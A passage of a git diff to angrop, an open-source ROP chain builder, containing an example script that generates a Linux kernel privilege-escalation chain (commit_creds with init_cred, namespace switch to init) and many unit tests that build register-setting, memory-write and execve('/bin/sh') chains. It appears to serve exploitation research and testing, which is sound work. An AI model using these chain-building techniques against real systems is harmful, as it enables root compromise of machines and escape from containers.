"/tmp/linux_gadget_cache" +if os.path.exists(cache): + rop.load_gadgets(cache, optimize=False) +else: + rop.find_gadgets(processes=cpu_num, optimize=False) + rop.save_gadgets(cache) +print("gadget finding time:", time.time() - start) + +start = time.time() +rop.optimize(processes=cpu_num) +print("graph optimization time:", time.time() - start) + +init_cred = 0xffffffff8368b220 
+init_nsproxy = 0xffffffff8368ad00 +start = time.time() +chain = rop.func_call("commit_creds", [init_cred]) + \ + rop.func_call("find_task_by_vpid", [1]) + \ + rop.move_regs(rdi='rax') + \ + rop.set_regs(rsi=init_nsproxy, preserve_regs={'rdi'}) + \ + rop.func_call("switch_task_namespaces", [], preserve_regs={'rdi', 'rsi'}) + \ + rop.func_call('__x64_sys_fork', []) + \ + rop.func_call('msleep', [0xffffffff]) +print("chain generation time:", time.time() - start) + +chain.pp() +chain.print_payload_code() diff --git a/gifs/execve.gif b/gifs/execve.gif new file mode 100644 index 00000000..fb260cba Binary files /dev/null and b/gifs/execve.gif differ diff --git a/gifs/find_gadget.gif b/gifs/find_gadget.gif new file mode 100644 index 00000000..ed63c788 Binary files /dev/null and b/gifs/find_gadget.gif differ diff --git a/gifs/kernel.gif b/gifs/kernel.gif new file mode 100644 index 00000000..ae7a449c Binary files /dev/null and b/gifs/kernel.gif differ diff --git a/pyproject.toml b/pyproject.toml index 890c3fc5..fed528d4 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -1,4 +1,3 @@ [build-system] requires = ["setuptools"] build-backend = "setuptools.build_meta" - diff --git a/tests/test_chainbuilder.py b/tests/test_chainbuilder.py index 6000fe1c..26975e70 100644 --- a/tests/test_chainbuilder.py +++ b/tests/test_chainbuilder.py @@ -5,6 +5,7 @@ import angr import angrop # pylint: disable=unused-import from angrop.rop_value import RopValue +from angrop.rop_block import RopBlock from angrop.errors import RopException BIN_DIR = os.path.join(os.path.dirname(__file__), "..", "..", "binaries") @@ -16,7 +17,7 @@ def test_symbolic_data(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -107,7 +108,7 @@ def test_x86_64_syscall(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + 
rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -150,7 +151,7 @@ def test_i386_mem_write(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -167,7 +168,7 @@ def test_ropvalue(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -215,7 +216,7 @@ def test_set_regs(): proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -231,7 +232,7 @@ def test_add_to_mem(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -249,9 +250,9 @@ def test_add_to_mem(): cache_path = os.path.join(CACHE_DIR, "armel_glibc_2.31") proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) - rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True, cond_br=False) if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -263,7 +264,7 @@ def test_add_to_mem(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -276,7 +277,7 @@ def 
test_pivot(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -297,7 +298,7 @@ def test_shifter(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -323,7 +324,7 @@ def test_shifter(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -338,7 +339,7 @@ def test_shifter(): proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -354,7 +355,7 @@ def test_shifter(): rop = proj.analyses.ROP(fast_mode=True, only_check_near_rets=False) if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -371,7 +372,7 @@ def test_retsled(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -398,7 +399,7 @@ def test_retsled(): proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -505,8 +506,15 @@ def test_aarch64_cond_branch(): 
load_address=0x400000, auto_load_libs=False, ) - rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, cond_br=True) rop.find_gadgets_single_threaded(show_progress=False) + addrs = [x.addr for x in rop._all_gadgets] + + assert addrs.count(0x40000c) == 2 + assert addrs.count(0x400010) == 2 + assert 0x400008 in addrs or 0x400020 in addrs + assert any(x in addrs for x in (0x400004, 0x40001c)) + chain = rop.set_regs(x2=0x41414141) state = chain.exec() assert state.regs.x2.concrete_value == 0x41414141 @@ -530,8 +538,7 @@ def test_aarch64_mem_access(): assert state.regs.x0.concrete_value == 0x41414141 for action in state.history.actions: if action.type == action.MEM and action.action == action.WRITE: - assert action.addr.ast.concrete_value >= 0x1000 - assert action.addr.ast.concrete_value < 0x2000 + assert 0x400000 <= action.addr.ast.concrete_value < 0x401000 def test_mipstake(): proj = angr.Project(os.path.join(BIN_DIR, "tests", "mips", "mipstake"), auto_load_libs=True, arch="mips") @@ -585,6 +592,547 @@ def test_unexploitable(): assert state.regs.rsi.concrete_value == 0x4242424242424242 assert state.regs.rdx.concrete_value == 0x4343434343434343 +def test_graph_search_reg_setter(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "arjsfxjr"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False) + cache_path = os.path.join(CACHE_DIR, "arjsfxjr") + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path) + else: + rop.find_gadgets() + rop.save_gadgets(cache_path) + + # the easy peasy pop-only reg setter + chain = rop.set_regs(r15=0x41414141) + assert chain + + # the ability to utilize concrete values + # 0x000000000040259e : xor eax, eax ; add rsp, 8 ; ret + chain = rop.set_regs(rax=0) + assert chain + + # the ability to set a register and then move it to another + chain = rop.set_regs(rax=0x41414141) + assert chain + state = chain.exec() + assert 
state.regs.rax.concrete_value == 0x41414141 + + # the ability to write_to_mem + chain = rop.write_to_mem(0x41414141, b'BBBB') + assert chain + state = chain.exec() + assert state.solver.eval(state.memory.load(0x41414141, 4), cast_to=bytes) == b'BBBB' + + # the ability to write_to_mem and utilize jmp_mem gadgets + chain = rop.func_call(0xdeadbeef, [0x41414141, 0x42424242, 0x43434343]) + state = chain.concrete_exec_til_addr(0xdeadbeef) + assert state.regs.rdi.concrete_value == 0x41414141 + assert state.regs.rsi.concrete_value == 0x42424242 + assert state.regs.rdx.concrete_value == 0x43434343 + assert state.ip.concrete_value == 0xdeadbeef + +def test_rebalance_ast(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP() + + rop.analyze_gadget(0x512ecf) # pop rcx; ret + rop.analyze_gadget(0x533e24) # mov eax, dword ptr [rsp]; add rsp, 0x10; pop rbx; ret + + chain = rop.set_regs(rax=0x41414142, rbx=0x42424243, rcx=0x43434344) + state = chain.exec() + assert state.regs.rax.concrete_value == 0x41414142 + assert state.regs.rbx.concrete_value == 0x42424243 + assert state.regs.rcx.concrete_value == 0x43434344 + +def test_normalize_call(): + proj = angr.load_shellcode( + """ + pop rsi + ret + mov edx, ebx + mov r8, rax + call rsi + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + chain = rop.move_regs(r8="rax") + assert chain + + proj = angr.load_shellcode( + """ + pop rax + ret + lea rsp, [rsp + 8] + ret + add eax, 0x2f484c7 + mov rdx, r12 + mov r8, rbx + call rax + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + try: + chain = rop.move_regs(r8="rax") + assert chain is None + except RopException: + pass + +def 
test_normalize_jmp_mem(): + proj = angr.load_shellcode( + """ + pop rbx + pop r10 + call qword ptr [rbp + 0x48] + pop rbp + ret + pop rax + pop rbx + ret + mov qword ptr [rbx], rax; + ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(r10=0x41414141) + state = chain.exec() + assert state.regs.r10.concrete_value == 0x41414141 + + proj = angr.load_shellcode( + """ + pop r9 + pop rbp + call qword ptr [rbp + 0x48] + pop rbp + ret + pop rax + pop rbx + ret + mov qword ptr [rbx], rax; + ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(r9=0x41414141) + state = chain.exec() + assert state.regs.r9.concrete_value == 0x41414141 + +def test_jmp_mem_normalize_simple_target(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) + rop.analyze_gadget(0x004a9d67) + rop.analyze_gadget(0x004cbbb7) + rop.analyze_gadget(0x004c1317) + rop.chain_builder.optimize() + chain = rop.move_regs(r5="r1") + assert chain + +def test_normalize_conditional(): + proj = angr.load_shellcode( + """ + pop rbp + ret + cmp ebp, esp + pop rax + pop rdx + jne 0x4072a8 + pop rbx + pop rbp + pop r12 + ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + +def test_normalize_moves_in_reg_setter(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", + "ALLSTAR_android-libzipfile-dev_liblog.so.0.21.0"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, 
only_check_near_rets=False) + rop.analyze_gadget(0x0000000000403765) # pop rax; ret + rop.analyze_gadget(0x000000000040236e) # pop rsi; ret + rop.analyze_gadget(0x0000000000401a50) # pop rbp ; ret + rop.analyze_gadget(0x0000000000404149) # mov dword ptr [rsi + 0x30], eax; xor eax, eax; pop rbx; ret + rop.analyze_gadget(0x0000000000402d7a) # mov edx, ebp; mov rsi, r12; mov edi, r13d; + # call 0x401790; jmp qword ptr [rip + 0x2058ca] + rop.chain_builder.optimize() + + chain = rop.set_regs(rdx=0x41414141) + assert chain is not None + +def test_normalize_oop_jmp_mem(): + proj = angr.load_shellcode( + """ + mov rax, qword ptr [rsp + 8]; mov edx, ebp; mov esi, ebx; mov rdi, rax; call qword ptr [rax + 0x68] + pop rdi; + ret + pop rsi; + ret + mov qword ptr[rdi], rsi; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + +def test_normalize_symbolic_access(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "ALLSTAR_alex_alex"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.analyze_gadget(0x0000000000594254) # : pop r9 ; add byte ptr [rax - 9], cl ; ret + rop.analyze_gadget(0x000000000040fb98) # : pop rax ; ret + rop.chain_builder.optimize() + rop.set_regs(r9=0x41414141) + +def test_riscv(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", "server_eapp.eapp_riscv"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False) + cache_path = os.path.join(CACHE_DIR, "riscv_server_eapp") + if os.path.exists(cache_path): + rop.load_gadgets(cache_path, optimize=False) + else: + rop.find_gadgets(optimize=False) + rop.save_gadgets(cache_path) + + rop.optimize() + chain = rop.set_regs(a0=0x41414141, a1=0x42424242) + state = chain.exec() + assert state.regs.a0.concrete_value == 0x41414141 + assert state.regs.a1.concrete_value 
== 0x42424242 + +def test_nested_optimization(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", "abgate-libabGateQt.so"), + load_options={'main_opts':{'base_addr': 0}}, + ) + rop = proj.analyses.ROP(fast_mode=False, cond_br=True, max_bb_cnt=5) + + rop.analyze_addr(0x5f7a) + rop.analyze_addr(0x77b0) + rop.analyze_addr(0x77da) + rop.analyze_addr(0x775e) + + rop.chain_builder.optimize() + + chain = rop.func_call(0xdeadbeef, [0x40404040, 0x41414141, 0x42424242], needs_return=False) + + assert chain is not None + +def test_normalize_jmp_reg(): + proj = angr.load_shellcode( + """ + pop rax; ret + mov rax, rdi; pop rbx; ret + mov eax, ebx; pop rbx; ret + pop rbx; ret + add rsp, 8; ret + mov edx, eax; mov esi, 1; call rbx + pop rdi; ret + mov dword ptr [rdx], edi; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + rop.write_to_mem(0x41414141, b'BBBB') + +def test_normalize_oop_jmp_reg(): + proj = angr.load_shellcode( + """ + pop rdi; ret + mov rax, rdi; ret + pop rbx; ret + add rsp, 8; ret + add rsp, 0x18; ret + mov rdx, rax; mov rdi, qword ptr [rsp + 8]; call rbx + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + chain = rop.set_regs(rax=0x3b, rdi=0x41414141, rdx=0) + assert chain is not None + +def test_double_ropblock(): + proj = angr.load_shellcode( + """ + pop rax; mov byte ptr [rbx], 1; ret + mov rdi, rax; ret + pop rbx; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + chain = rop.set_regs(rax=0x3b, rdi=0x41414141) + assert chain is not None + +def test_maximum_write_gadget(): + proj = 
angr.load_shellcode( + """ + pop rax; ret + pop rdi; ret + mov qword ptr [rax], rdi; add rsp, 0x3d8; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, stack_gsize=200) + rop.find_gadgets_single_threaded(show_progress=False) + rop.write_to_mem(0x41414141, b'BBBB') + +def test_normalize_jmp_mem_with_pop(): + proj = angr.load_shellcode( + """ + pop rax; pop rbx; ret + pop rdi; ret + pop r12; ret + pop r13; ret + pop rsi; ret + mov qword ptr [rax], rdi; ret + mov rdx, r13; mov rsi, r14; mov edi, r15d; call qword ptr [r12 + rbx*8] + syscall + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, stack_gsize=200) + rop.find_gadgets_single_threaded(show_progress=False) + chain = rop.execve() + assert chain is not None + +def test_sim_exec_memory_write(): + proj = angr.load_shellcode( + """ + pop rax; + ret; + pop rbx; + mov qword ptr [rax+0x10], 0x41414141 + ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(rbx=1) + state = chain.exec() + addr = None + for act in state.history.actions: + if act.type != 'mem': + continue + if not act.data.ast.symbolic and act.data.ast.concrete_value == 0x41414141: + assert not act.addr.ast.symbolic + addr = act.addr.ast.concrete_value + + rb = RopBlock.from_chain(chain) + _, state = rb.sim_exec() + assert state.solver.eval(state.memory.load(addr, 4)) == 0x41414141 + +def local_conflict_address(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "ALLSTAR_9base_dd"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP() + + rop.find_gadgets(processes=16) + + chain = rop.execve() + chain.pp() + state = 
chain.sim_exec_til_syscall() + data = state.solver.eval(state.memory.load(state.regs.rdi, 8), cast_to=bytes) + assert data == b'/bin/sh\x00' + + assert len(chain._values) <= 23 + +def test_normalize_jmp_mem_with_oop_access(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "ALLSTAR_aces3_xaces3"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + + rop.analyze_gadget(0x0000000000a42cc2) + rop.analyze_gadget(0x0000000000a28b7e) + rop.analyze_gadget(0x00000000004ff8aa) + rop.analyze_gadget(0x00000000004ff46a) + rop.analyze_gadget(0x00000000004e91f7) + rop.analyze_gadget(0x000000000043b2fa) # : add rsp, 0x18 ; ret + + rop.optimize() + + chain = rop.set_regs(r10=0x41414141) + assert chain is not None + +def test_mem_write_with_stack_controller(): + proj = angr.load_shellcode( + """ + pop r8; mov qword ptr [r8 + 0x10], rax; ret + pop rax; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.write_to_mem(0x41424344, b'BBBB') + assert chain is not None + +def test_partial_pop(): + for _ in range(10): + proj = angr.load_shellcode( + """ + pop rcx; mov eax, ecx; ret + pop rax; ret + mov rbx, rax; ret + mov ebx, eax; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.analyze_gadget(0x400000) + rop.find_gadgets_single_threaded(show_progress=False) + + value = RopValue(0x4141414141414141, proj) + chains = list(rop.chain_builder._reg_setter.find_candidate_chains_giga_graph_search(None, + {'rbx': value}, + {}, + False)) + assert chains + + chain = rop.set_regs(rbx=0x4141414141414141) + assert chain is not None + +def test_mem_write_with_cache(): + proj = angr.load_shellcode( + """ + mov dword ptr 
[rax+0x10], ebx; ret + pop rax; ret + pop rbx; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.analyze_gadget(0x400000) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.write_to_mem(0x41414141, b'BBBB') + assert chain is not None + +def test_reg_setting_equal_set(): + proj = angr.load_shellcode( + """ + pop rdi; ret + lea rax, [rdi + 2]; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.analyze_gadget(0x400000) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(rax=0x41414141, rdi=0x42424242) + assert chain is not None + +def test_short_write(): + proj = angr.load_shellcode( + """ + mov ecx, 0x480021c6; cwde ; mov qword ptr [rdx + rcx*8 - 8], rax; add rsp, 8; ret + pop rax; ret + pop rdx; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.write_to_mem(0x41414141, b'BBBB') + assert chain is not None + +def test_pop_write(): + proj = angr.load_shellcode( + """ + push rax; pop qword ptr [rcx]; ret + pop rax; ret + pop rcx; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.write_to_mem(0x41414141, b'BBBB') + assert chain is not None + +def test_riscv_oop_normalization(): + cache_path = os.path.join(CACHE_DIR, "riscv_asterisk-libasteriskpj.so.2") + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", "asterisk-libasteriskpj.so.2"), + load_options={'main_opts':{'base_addr': 0}}) + rop = 
proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path, optimize=False) + else: + rop.find_gadgets(processes=16, optimize=False) + rop.save_gadgets(cache_path) + + g = rop.analyze_gadget(0x00000000000407cc) + rb = rop.chain_builder._reg_setter.normalize_gadget(g) + assert rb is not None + + g = rop.analyze_gadget(0x000000000007cc66) + rb = rop.chain_builder._reg_setter.normalize_gadget(g) + assert rb is not None + def run_all(): functions = globals() all_functions = {x:y for x, y in functions.items() if x.startswith('test_')} @@ -592,6 +1140,8 @@ def run_all(): if hasattr(all_functions[f], '__call__'): print(f) all_functions[f]() + print("local_conflict_address") + local_conflict_address() if __name__ == "__main__": import sys diff --git a/tests/test_find_gadgets.py b/tests/test_find_gadgets.py index a7e00fc1..cdb0392c 100644 --- a/tests/test_find_gadgets.py +++ b/tests/test_find_gadgets.py @@ -1,5 +1,6 @@ import os import logging +from io import BytesIO import angr import angrop # pylint: disable=unused-import @@ -37,7 +38,7 @@ def local_multiprocess_find_gadgets(): proj = angr.Project(os.path.join(tests_dir, "i386", "bronze_ropchain"), auto_load_libs=False) rop = proj.analyses.ROP() - rop.find_gadgets(show_progress=False) + rop.find_gadgets(show_progress=True) assert all(gadget_exists(rop, x) for x in [0x080a9773, 0x08091cf5, 0x08092d80, 0x080920d3]) @@ -174,16 +175,6 @@ def test_i386_syscall(): """ assert all(not gadget_exists(rop, x) for x in [0x8049189]) -def test_gadget_timeout(): - # pylint: disable=pointless-string-statement - proj = angr.Project(os.path.join(tests_dir, "x86_64", "datadep_test"), auto_load_libs=False) - rop = proj.analyses.ROP() - """ - 0x4005d5 ret 0xc148 - """ - gadget = rop.analyze_gadget(0x4005d5) - assert gadget - def local_multiprocess_analyze_gadget_list(): # pylint: disable=pointless-string-statement proj = angr.Project(os.path.join(tests_dir, "x86_64", 
"datadep_test"), auto_load_libs=False) @@ -203,7 +194,8 @@ def test_gadget_filtering(): rop.analyze_gadget(0x42bca5) rop.analyze_gadget(0x42c3c1) rop.chain_builder.bootstrap() - assert len(rop.chain_builder._reg_setter._reg_setting_gadgets) == 1 + values = list(rop.chain_builder._shifter.shift_gadgets.values()) + assert len(values) == 1 and len(values[0]) == 1 def test_aarch64_svc(): proj = angr.Project(os.path.join(tests_dir, "aarch64", "libc.so.6"), auto_load_libs=False) @@ -226,12 +218,12 @@ def test_enter(): def test_jmp_mem_gadget(): proj = angr.Project(os.path.join(tests_dir, "x86_64", "libc.so.6"), auto_load_libs=False) rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) - # 0x0000000000031f6d : jmp qword ptr [rax] - # 0x000000000004bec2 : call qword ptr [r11 + rax*8] - g = rop.analyze_gadget(0x0000000000431f6d) + # 0x00000000001a2bd9 : xchg edx, esi ; jmp qword ptr [rax] + # 0x00000000001905a1 : xor ebp, edx ; call qword ptr [rdx] + g = rop.analyze_gadget(0x5a2bd9) assert g is not None assert g.transit_type == 'jmp_mem' - g = rop.analyze_gadget(0x000000000044bec2) + g = rop.analyze_gadget(0x5905a1) assert g is not None assert g.transit_type == 'jmp_mem' @@ -252,14 +244,122 @@ def test_syscall_next_block(): chain = rop.do_syscall(2, [1, 0x41414141, 0x42424242, 0], preserve_regs={'eax'}, needs_return=True) assert chain +def test_rex_pop_r10(): + f = BytesIO() + f.write(b"OZ\xc3") + proj = angr.Project( + BytesIO(b"OZ\xc3"), + main_opts={ + "backend": "blob", + "arch": "amd64", + "entry_point": 0, + "base_addr": 0, + }) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + g = rop.analyze_gadget(0) + assert g is not None + +def test_max_stack_change(): + proj = angr.load_shellcode(""" + xchg ebp, eax + ret 0xd020 + """, + "amd64", + ) + + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + g = rop.analyze_gadget(0) + assert g is None + +def test_symbolized_got(): + proj = 
angr.Project(os.path.join(tests_dir, "x86_64", "ALLSTAR_acct_sa"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + g = rop.analyze_gadget(0x40156A) + assert g is not None + + # this will be considered pop, but it is not pop + # pop rax; add al, 0; add al, al; ret + g = rop.analyze_gadget(0x406850) + assert g is None or 'rax' not in g.popped_regs + +def test_syscall_when_ret_only(): + proj = angr.load_shellcode( + """ + syscall + """, + "amd64", + load_address=0x400000, + simos='linux', + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=True) + rop.find_gadgets_single_threaded(show_progress=False) + assert rop._all_gadgets + +def test_riscv(): + proj = angr.Project(os.path.join(tests_dir, "riscv", "server_eapp.eapp_riscv"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False) + g = rop.analyze_gadget(0xA86C) + assert g is not None + + proj = angr.Project(os.path.join(tests_dir, "riscv", "abgate-libabGateQt.so"), + load_options={'main_opts':{'base_addr': 0}}, + ) + rop = proj.analyses.ROP(fast_mode=False, cond_br=True, max_bb_cnt=5) + g = rop.analyze_addr(0x77da) + assert g + +def test_jmp_mem_num_mem_access(): + proj = angr.load_shellcode( + """ + mov edx, ebp; + mov rsi, r14; + mov edi, r15d; + call qword ptr [r12 + rbx*8] + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + g = rop.analyze_gadget(0x400000) + assert g is not None + +def test_exit_target(): + proj = angr.load_shellcode( + """ + mov eax, dword ptr [rsp]; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + g = rop.analyze_gadget(0x400000) + assert not g.popped_regs + +def test_syscall_block_hash(): + proj = angr.Project(os.path.join(tests_dir, "x86_64", "ALLSTAR_apcalc-dev_sample_many"), + 
load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + # the following line is necessary because it populates syscall_locations + rop.gadget_finder.gadget_analyzer # pylint: disable=pointless-statement + tasks = list(rop.gadget_finder._addresses_to_check_with_caching(show_progress=False)) + for addr in [0x402de7, 0x425a00, 0x43e083, 0x4b146c]: + assert addr in tasks + def run_all(): functions = globals() all_functions = {x:y for x, y in functions.items() if x.startswith('test_')} for f in sorted(all_functions.keys()): + print(f) if hasattr(all_functions[f], '__call__'): all_functions[f]() - local_multiprocess_find_gadgets() + print("local_multiprocess_analyze_gadget_list") local_multiprocess_analyze_gadget_list() + print("local_multiprocess_find_gadgets") + local_multiprocess_find_gadgets() if __name__ == "__main__": logging.getLogger("angrop.rop").setLevel(logging.DEBUG) diff --git a/tests/test_gadgets.py b/tests/test_gadgets.py index edfcb99e..6755eaf3 100644 --- a/tests/test_gadgets.py +++ b/tests/test_gadgets.py @@ -48,7 +48,7 @@ def test_arm_mem_change_gadget(): # pylint: disable=pointless-string-statement proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) - rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True, max_sym_mem_access=4) """ 0x0004f08c <+28>: ldr r2, [r4, #48] ; 0x30 @@ -91,7 +91,7 @@ def test_arm_mem_change_gadget(): 4c1eaa bx lr """ gadget = rop.analyze_gadget(0x4c1ea4+1) # thumb mode - assert not gadget.mem_changes + assert gadget.mem_changes """ 4c1e8e ldr r1, [r4,#0x14] @@ -115,10 +115,14 @@ def test_pivot_gadget(): """ gadget = rop.analyze_gadget(0x5719da) assert gadget.stack_change == 0x4 + assert gadget.stack_change_before_pivot == 